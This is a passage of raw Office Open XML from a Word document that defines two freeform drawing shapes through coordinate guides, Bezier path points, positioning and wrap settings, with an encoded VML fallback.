                <wp:effectExtent l="0" t="0" r="22860" b="16510"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="19862"/>
                    <wp:lineTo x="21526" y="19862"/>
                    <wp:lineTo x="21526" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="7" name="Freeform 7"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="739627" cy="110984"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="connsiteX0" fmla="*/ 87444 w 739627"/>
                            <a:gd name="connsiteY0" fmla="*/ 6769 h 110984"/>
                            <a:gd name="connsiteX1" fmla="*/ 67274 w 739627"/>
                            <a:gd name="connsiteY1" fmla="*/ 16855 h 110984"/>
                            <a:gd name="connsiteX2" fmla="*/ 33656 w 739627"/>
                            <a:gd name="connsiteY2" fmla="*/ 26940 h 110984"/>
                            <a:gd name="connsiteX3" fmla="*/ 13486 w 739627"/>
                            <a:gd name="connsiteY3" fmla="*/ 33663 h 110984"/>
                            <a:gd name="connsiteX4" fmla="*/ 3400 w 739627"/>
                            <a:gd name="connsiteY4" fmla="*/ 37025 h 110984"/>
                            <a:gd name="connsiteX5" fmla="*/ 39 w 739627"/>
                            <a:gd name="connsiteY5" fmla="*/ 47111 h 110984"/>
                            <a:gd name="connsiteX6" fmla="*/ 6762 w 739627"/>
                            <a:gd name="connsiteY6" fmla="*/ 67281 h 110984"/>
                            <a:gd name="connsiteX7" fmla="*/ 26933 w 739627"/>
                            <a:gd name="connsiteY7" fmla="*/ 80728 h 110984"/>
                            <a:gd name="connsiteX8" fmla="*/ 47103 w 739627"/>
                            <a:gd name="connsiteY8" fmla="*/ 84090 h 110984"/>
                            <a:gd name="connsiteX9" fmla="*/ 63912 w 739627"/>
                            <a:gd name="connsiteY9" fmla="*/ 87452 h 110984"/>
                            <a:gd name="connsiteX10" fmla="*/ 104253 w 739627"/>
                            <a:gd name="connsiteY10" fmla="*/ 90813 h 110984"/>
                            <a:gd name="connsiteX11" fmla="*/ 400089 w 739627"/>
                            <a:gd name="connsiteY11" fmla="*/ 100899 h 110984"/>
                            <a:gd name="connsiteX12" fmla="*/ 470686 w 739627"/>
                            <a:gd name="connsiteY12" fmla="*/ 104261 h 110984"/>
                            <a:gd name="connsiteX13" fmla="*/ 608518 w 739627"/>
                            <a:gd name="connsiteY13" fmla="*/ 110984 h 110984"/>
                            <a:gd name="connsiteX14" fmla="*/ 702647 w 739627"/>
                            <a:gd name="connsiteY14" fmla="*/ 104261 h 110984"/>
                            <a:gd name="connsiteX15" fmla="*/ 726180 w 739627"/>
                            <a:gd name="connsiteY15" fmla="*/ 97537 h 110984"/>
                            <a:gd name="connsiteX16" fmla="*/ 732903 w 739627"/>
                            <a:gd name="connsiteY16" fmla="*/ 87452 h 110984"/>
                            <a:gd name="connsiteX17" fmla="*/ 739627 w 739627"/>
                            <a:gd name="connsiteY17" fmla="*/ 67281 h 110984"/>
                            <a:gd name="connsiteX18" fmla="*/ 732903 w 739627"/>
                            <a:gd name="connsiteY18" fmla="*/ 26940 h 110984"/>
                            <a:gd name="connsiteX19" fmla="*/ 726180 w 739627"/>
                            <a:gd name="connsiteY19" fmla="*/ 16855 h 110984"/>
                            <a:gd name="connsiteX20" fmla="*/ 675753 w 739627"/>
                            <a:gd name="connsiteY20" fmla="*/ 6769 h 110984"/>
                            <a:gd name="connsiteX21" fmla="*/ 554730 w 739627"/>
                            <a:gd name="connsiteY21" fmla="*/ 3408 h 110984"/>
                            <a:gd name="connsiteX22" fmla="*/ 403450 w 739627"/>
                            <a:gd name="connsiteY22" fmla="*/ 3408 h 110984"/>
                            <a:gd name="connsiteX23" fmla="*/ 191659 w 739627"/>
                            <a:gd name="connsiteY23" fmla="*/ 46 h 110984"/>
                            <a:gd name="connsiteX24" fmla="*/ 87444 w 739627"/>
                            <a:gd name="connsiteY24" fmla="*/ 6769 h 1109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739627" h="110984">
                              <a:moveTo>
                                <a:pt x="87444" y="6769"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="66713" y="9570"/>
                                <a:pt x="74213" y="13964"/>
                                <a:pt x="67274" y="16855"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="46912" y="25339"/>
                                <a:pt x="51246" y="21663"/>
                                <a:pt x="33656" y="26940"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="26868" y="28976"/>
                                <a:pt x="20209" y="31422"/>
                                <a:pt x="13486" y="33663"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="3400" y="37025"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="2280" y="40387"/>
                                <a:pt x="-352" y="43589"/>
                                <a:pt x="39" y="47111"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="822" y="54155"/>
                                <a:pt x="865" y="63350"/>
                                <a:pt x="6762" y="67281"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="13486" y="71763"/>
                                <a:pt x="18962" y="79399"/>
                                <a:pt x="26933" y="80728"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="47103" y="84090"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="52725" y="85112"/>
                                <a:pt x="58237" y="86784"/>
                                <a:pt x="63912" y="87452"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="77313" y="89028"/>
                                <a:pt x="90773" y="90209"/>
                                <a:pt x="104253" y="90813"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="335414" y="101163"/>
                                <a:pt x="221931" y="94300"/>
                                <a:pt x="400089" y="100899"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="423632" y="101771"/>
                                <a:pt x="447150" y="103215"/>
                                <a:pt x="470686" y="104261"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="589735" y="109552"/>
                                <a:pt x="510814" y="105236"/>
                                <a:pt x="608518" y="110984"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="646561" y="109172"/>
                                <a:pt x="669403" y="110305"/>
                                <a:pt x="702647" y="104261"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="711931" y="102573"/>
                                <a:pt x="717541" y="100417"/>
                                <a:pt x="726180" y="97537"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="728421" y="94175"/>
                                <a:pt x="731262" y="91144"/>
                                <a:pt x="732903" y="87452"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="735781" y="80975"/>
                                <a:pt x="739627" y="67281"/>
                                <a:pt x="739627" y="67281"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="738561" y="57690"/>
                                <a:pt x="738536" y="38205"/>
                                <a:pt x="732903" y="26940"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="731096" y="23326"/>
                                <a:pt x="729606" y="18996"/>
                                <a:pt x="726180" y="16855"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="714344" y="9457"/>
                                <a:pt x="687337" y="7284"/>
                                <a:pt x="675753" y="6769"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="635436" y="4977"/>
                                <a:pt x="595071" y="4528"/>
                                <a:pt x="554730" y="3408"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="455042" y="-4261"/>
                                <a:pt x="575266" y="3408"/>
                                <a:pt x="403450" y="3408"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="332844" y="3408"/>
                                <a:pt x="262260" y="867"/>
                                <a:pt x="191659" y="46"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="165887" y="-254"/>
                                <a:pt x="108175" y="3968"/>
                                <a:pt x="87444" y="6769"/>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11FAA5" id="Freeform 499" o:spid="_x0000_s1026" style="position:absolute;margin-left:74.75pt;margin-top:204.25pt;width:58.25pt;height:8.75pt;z-index:251785216;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:middle" coordsize="739627,11098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&#10;AAQA8wAAAHwLAAAAAA==&#10;" path="m87444,6769c66713,9570,74213,13964,67274,16855,46912,25339,51246,21663,33656,26940,26868,28976,20209,31422,13486,33663l3400,37025c2280,40387,-352,43589,39,47111,822,54155,865,63350,6762,67281,13486,71763,18962,79399,26933,80728l47103,84090c52725,85112,58237,86784,63912,87452,77313,89028,90773,90209,104253,90813,335414,101163,221931,94300,400089,100899,423632,101771,447150,103215,470686,104261,589735,109552,510814,105236,608518,110984,646561,109172,669403,110305,702647,104261,711931,102573,717541,100417,726180,97537,728421,94175,731262,91144,732903,87452,735781,80975,739627,67281,739627,67281,738561,57690,738536,38205,732903,26940,731096,23326,729606,18996,726180,16855,714344,9457,687337,7284,675753,6769,635436,4977,595071,4528,554730,3408,455042,-4261,575266,3408,403450,3408,332844,3408,262260,867,191659,46,165887,-254,108175,3968,87444,6769xe" fillcolor="#4472c4 [3204]" strokecolor="#1f3763 [1604]" strokeweight="1pt">
                <v:fill opacity="19789f"/>
                <v:stroke joinstyle="miter"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="87444,6769;67274,16855;33656,26940;13486,33663;3400,37025;39,47111;6762,67281;26933,80728;47103,84090;63912,87452;104253,90813;400089,100899;470686,104261;608518,110984;702647,104261;726180,97537;732903,87452;739627,67281;732903,26940;726180,16855;675753,6769;554730,3408;403450,3408;191659,46;87444,6769" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251784192" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6FCCE1FE" wp14:editId="20EA571A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1233460</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>678068</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="781395" cy="174812"/>
                <wp:effectExtent l="0" t="25400" r="57150" b="28575"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="-3142"/>
                    <wp:lineTo x="0" y="21993"/>
                    <wp:lineTo x="22478" y="21993"/>
                    <wp:lineTo x="22478" y="9425"/>
                    <wp:lineTo x="21776" y="-3142"/>
                    <wp:lineTo x="0" y="-3142"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="10" name="Freeform 10"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="781395" cy="174812"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="connsiteX0" fmla="*/ 1466 w 781395"/>
                            <a:gd name="connsiteY0" fmla="*/ 13447 h 174812"/>
                            <a:gd name="connsiteX1" fmla="*/ 4827 w 781395"/>
                            <a:gd name="connsiteY1" fmla="*/ 26894 h 174812"/>
                            <a:gd name="connsiteX2" fmla="*/ 11551 w 781395"/>
                            <a:gd name="connsiteY2" fmla="*/ 80682 h 174812"/>
                            <a:gd name="connsiteX3" fmla="*/ 18274 w 781395"/>
                            <a:gd name="connsiteY3" fmla="*/ 100853 h 174812"/>
                            <a:gd name="connsiteX4" fmla="*/ 31721 w 781395"/>
                            <a:gd name="connsiteY4" fmla="*/ 121023 h 174812"/>
                            <a:gd name="connsiteX5" fmla="*/ 38445 w 781395"/>
                            <a:gd name="connsiteY5" fmla="*/ 131109 h 174812"/>
                            <a:gd name="connsiteX6" fmla="*/ 51892 w 781395"/>
                            <a:gd name="connsiteY6" fmla="*/ 151279 h 174812"/>
                            <a:gd name="connsiteX7" fmla="*/ 75424 w 781395"/>
                            <a:gd name="connsiteY7" fmla="*/ 158003 h 174812"/>
                            <a:gd name="connsiteX8" fmla="*/ 125851 w 781395"/>
                            <a:gd name="connsiteY8" fmla="*/ 154641 h 174812"/>
                            <a:gd name="connsiteX9" fmla="*/ 172916 w 781395"/>
                            <a:gd name="connsiteY9" fmla="*/ 158003 h 174812"/>
                            <a:gd name="connsiteX10" fmla="*/ 213257 w 781395"/>
                            <a:gd name="connsiteY10" fmla="*/ 161365 h 174812"/>
                            <a:gd name="connsiteX11" fmla="*/ 267045 w 781395"/>
                            <a:gd name="connsiteY11" fmla="*/ 164726 h 174812"/>
                            <a:gd name="connsiteX12" fmla="*/ 300663 w 781395"/>
                            <a:gd name="connsiteY12" fmla="*/ 168088 h 174812"/>
                            <a:gd name="connsiteX13" fmla="*/ 468751 w 781395"/>
                            <a:gd name="connsiteY13" fmla="*/ 171450 h 174812"/>
                            <a:gd name="connsiteX14" fmla="*/ 546071 w 781395"/>
                            <a:gd name="connsiteY14" fmla="*/ 174812 h 174812"/>
                            <a:gd name="connsiteX15" fmla="*/ 566242 w 781395"/>
                            <a:gd name="connsiteY15" fmla="*/ 171450 h 174812"/>
                            <a:gd name="connsiteX16" fmla="*/ 626754 w 781395"/>
                            <a:gd name="connsiteY16" fmla="*/ 168088 h 174812"/>
                            <a:gd name="connsiteX17" fmla="*/ 737692 w 781395"/>
                            <a:gd name="connsiteY17" fmla="*/ 161365 h 174812"/>
                            <a:gd name="connsiteX18" fmla="*/ 757863 w 781395"/>
                            <a:gd name="connsiteY18" fmla="*/ 154641 h 174812"/>
                            <a:gd name="connsiteX19" fmla="*/ 767948 w 781395"/>
                            <a:gd name="connsiteY19" fmla="*/ 134471 h 174812"/>
                            <a:gd name="connsiteX20" fmla="*/ 774671 w 781395"/>
                            <a:gd name="connsiteY20" fmla="*/ 124385 h 174812"/>
                            <a:gd name="connsiteX21" fmla="*/ 781395 w 781395"/>
                            <a:gd name="connsiteY21" fmla="*/ 97491 h 174812"/>
                            <a:gd name="connsiteX22" fmla="*/ 774671 w 781395"/>
                            <a:gd name="connsiteY22" fmla="*/ 70597 h 174812"/>
                            <a:gd name="connsiteX23" fmla="*/ 751139 w 781395"/>
                            <a:gd name="connsiteY23" fmla="*/ 43703 h 174812"/>
                            <a:gd name="connsiteX24" fmla="*/ 737692 w 781395"/>
                            <a:gd name="connsiteY24" fmla="*/ 33618 h 174812"/>
                            <a:gd name="connsiteX25" fmla="*/ 727607 w 781395"/>
                            <a:gd name="connsiteY25" fmla="*/ 30256 h 174812"/>
                            <a:gd name="connsiteX26" fmla="*/ 717521 w 781395"/>
                            <a:gd name="connsiteY26" fmla="*/ 23532 h 174812"/>
                            <a:gd name="connsiteX27" fmla="*/ 704074 w 781395"/>
                            <a:gd name="connsiteY27" fmla="*/ 16809 h 174812"/>
                            <a:gd name="connsiteX28" fmla="*/ 693989 w 781395"/>
                            <a:gd name="connsiteY28" fmla="*/ 10085 h 174812"/>
                            <a:gd name="connsiteX29" fmla="*/ 653648 w 781395"/>
                            <a:gd name="connsiteY29" fmla="*/ 0 h 174812"/>
                            <a:gd name="connsiteX30" fmla="*/ 542710 w 781395"/>
                            <a:gd name="connsiteY30" fmla="*/ 6723 h 174812"/>
                            <a:gd name="connsiteX31" fmla="*/ 492283 w 781395"/>
                            <a:gd name="connsiteY31" fmla="*/ 10085 h 174812"/>
                            <a:gd name="connsiteX32" fmla="*/ 425048 w 781395"/>
                            <a:gd name="connsiteY32" fmla="*/ 13447 h 174812"/>
                            <a:gd name="connsiteX33" fmla="*/ 216619 w 781395"/>
                            <a:gd name="connsiteY33" fmla="*/ 10085 h 174812"/>
                            <a:gd name="connsiteX34" fmla="*/ 31721 w 781395"/>
                            <a:gd name="connsiteY34" fmla="*/ 13447 h 174812"/>
                            <a:gd name="connsiteX35" fmla="*/ 1466 w 781395"/>
                            <a:gd name="connsiteY35" fmla="*/ 13447 h 1748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781395" h="174812">
                              <a:moveTo>
                                <a:pt x="1466" y="13447"/>
                              </a:moveTo>
                              <a:cubicBezTo>
                                <a:pt x="-3016" y="15688"/>
                                <a:pt x="4142" y="22325"/>
                                <a:pt x="4827" y="26894"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="7507" y="44763"/>
                                <a:pt x="5838" y="63540"/>
                                <a:pt x="11551" y="80682"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="13792" y="87406"/>
                                <a:pt x="14343" y="94956"/>
                                <a:pt x="18274" y="100853"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="31721" y="121023"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="33962" y="124385"/>
                                <a:pt x="37167" y="127276"/>
                                <a:pt x="38445" y="131109"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="41970" y="141682"/>
                                <a:pt x="41100" y="144084"/>
                                <a:pt x="51892" y="151279"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="54786" y="153208"/>
                                <a:pt x="73630" y="157555"/>
                                <a:pt x="75424" y="158003"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="92233" y="156882"/>
                                <a:pt x="109005" y="154641"/>
                                <a:pt x="125851" y="154641"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="141579" y="154641"/>
                                <a:pt x="157234" y="156797"/>
                                <a:pt x="172916" y="158003"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="213257" y="161365"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="267045" y="164726"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="278274" y="165590"/>
                                <a:pt x="289407" y="167713"/>
                                <a:pt x="300663" y="168088"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="356672" y="169955"/>
                                <a:pt x="412722" y="170329"/>
                                <a:pt x="468751" y="171450"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="494524" y="172571"/>
                                <a:pt x="520273" y="174812"/>
                                <a:pt x="546071" y="174812"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="552887" y="174812"/>
                                <a:pt x="559449" y="172016"/>
                                <a:pt x="566242" y="171450"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="586374" y="169772"/>
                                <a:pt x="606594" y="169389"/>
                                <a:pt x="626754" y="168088"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="749250" y="160184"/>
                                <a:pt x="569213" y="169787"/>
                                <a:pt x="737692" y="161365"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="744416" y="159124"/>
                                <a:pt x="753932" y="160538"/>
                                <a:pt x="757863" y="154641"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="777127" y="125744"/>
                                <a:pt x="754033" y="162302"/>
                                <a:pt x="767948" y="134471"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="769755" y="130857"/>
                                <a:pt x="772864" y="127999"/>
                                <a:pt x="774671" y="124385"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="778118" y="117492"/>
                                <a:pt x="780116" y="103887"/>
                                <a:pt x="781395" y="97491"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="780463" y="92832"/>
                                <a:pt x="777902" y="76413"/>
                                <a:pt x="774671" y="70597"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="761842" y="47505"/>
                                <a:pt x="766518" y="54688"/>
                                <a:pt x="751139" y="43703"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="746580" y="40446"/>
                                <a:pt x="742557" y="36398"/>
                                <a:pt x="737692" y="33618"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="734615" y="31860"/>
                                <a:pt x="730776" y="31841"/>
                                <a:pt x="727607" y="30256"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="723993" y="28449"/>
                                <a:pt x="721029" y="25537"/>
                                <a:pt x="717521" y="23532"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="713170" y="21046"/>
                                <a:pt x="708425" y="19295"/>
                                <a:pt x="704074" y="16809"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="700566" y="14804"/>
                                <a:pt x="697681" y="11726"/>
                                <a:pt x="693989" y="10085"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="678010" y="2983"/>
                                <a:pt x="670559" y="2819"/>
                                <a:pt x="653648" y="0"/>
                              </a:cubicBezTo>
                              <a:lnTo>
                                <a:pt x="542710" y="6723"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="492283" y="10085"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="425048" y="13447"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="216619" y="10085"/>
                              </a:lnTo>
                              <a:cubicBezTo>
                                <a:pt x="154976" y="10085"/>
                                <a:pt x="93332" y="11459"/>
                                <a:pt x="31721" y="13447"/>
                              </a:cubicBezTo>
                              <a:cubicBezTo>
                                <a:pt x="23801" y="13702"/>
                                <a:pt x="5948" y="11206"/>
